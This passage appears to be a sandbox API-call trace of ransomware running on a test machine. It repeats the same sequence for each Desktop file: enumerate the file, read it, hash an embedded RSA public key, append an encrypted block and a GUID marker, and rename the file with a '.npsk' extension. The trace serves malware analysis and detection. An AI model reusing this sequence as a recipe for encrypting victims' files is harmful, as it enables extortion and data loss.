KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.314] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.315] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.315] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.315] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.315] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.315] GetLastError () returned 0x0 [0216.315] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.315] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.315] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.315] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.315] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.316] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.316] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x13521, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.316] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.316] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.316] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.317] CloseHandle (hObject=0x61c) returned 1 [0216.318] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\G6UpGZI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\g6upgzi.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\G6UpGZI.odp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\g6upgzi.odp.npsk")) returned 1 [0216.319] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21adfa60, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xd7ef1f90, ftLastAccessTime.dwHighDateTime=0x1d5e17a, ftLastWriteTime.dwLowDateTime=0xd7ef1f90, ftLastWriteTime.dwHighDateTime=0x1d5e17a, nFileSizeHigh=0x0, nFileSizeLow=0x7dee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5l8lCVAIclu7_.png", cAlternateFileName="I5L8LC~1.PNG")) returned 1 [0216.319] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\I5l8lCVAIclu7_.png") returned=".png" [0216.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\I5l8lCVAIclu7_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\i5l8lcvaiclu7_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.319] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=32238) returned 1 [0216.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.321] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7dc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.321] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.323] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7dee, lpOverlapped=0x0) returned 1 [0216.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.323] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.323] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.324] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.324] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.324] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.324] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.324] GetLastError () returned 0x0 [0216.324] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.324] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.325] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.325] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.325] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.325] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.325] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7dee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.325] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.325] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.325] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.326] CloseHandle (hObject=0x61c) returned 1 [0216.331] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\I5l8lCVAIclu7_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\i5l8lcvaiclu7_.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\I5l8lCVAIclu7_.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\i5l8lcvaiclu7_.png.npsk")) returned 1 [0216.332] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaf37a00, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0xc37b0890, ftLastAccessTime.dwHighDateTime=0x1d5e340, ftLastWriteTime.dwLowDateTime=0xc37b0890, ftLastWriteTime.dwHighDateTime=0x1d5e340, nFileSizeHigh=0x0, nFileSizeLow=0xc6cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcQVKTVKQ_mh-VfA.docx", cAlternateFileName="JCQVKT~1.DOC")) returned 1 [0216.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\jcQVKTVKQ_mh-VfA.docx") returned=".docx" [0216.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\jcQVKTVKQ_mh-VfA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\jcqvktvkq_mh-vfa.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.334] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=50891) returned 1 [0216.334] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.336] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc6a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.336] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.337] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.337] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc6cb, lpOverlapped=0x0) returned 1 [0216.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.338] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.338] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.339] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.339] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.339] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.339] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.339] GetLastError () returned 0x0 [0216.339] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.339] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.339] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.339] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.339] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.339] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.340] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc6cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.340] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.340] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.340] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.340] CloseHandle (hObject=0x61c) returned 1 [0216.344] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\jcQVKTVKQ_mh-VfA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\jcqvktvkq_mh-vfa.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\jcQVKTVKQ_mh-VfA.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\jcqvktvkq_mh-vfa.docx.npsk")) returned 1 [0216.345] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 1 [0216.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\krTqwdJtX5sPV.wav") returned=".wav" [0216.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\krTqwdJtX5sPV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\krtqwdjtx5spv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.346] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=97586) returned 1 [0216.346] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.348] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x17d0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.348] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.349] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x17d32, lpOverlapped=0x0) returned 1 [0216.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.350] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.351] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.351] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.351] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.351] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.351] GetLastError () returned 0x0 [0216.351] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.351] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.351] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.351] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.351] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.352] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.352] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x17d32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.353] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.353] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.353] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.353] CloseHandle (hObject=0x61c) returned 1 [0216.355] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\krTqwdJtX5sPV.wav" (normalized: 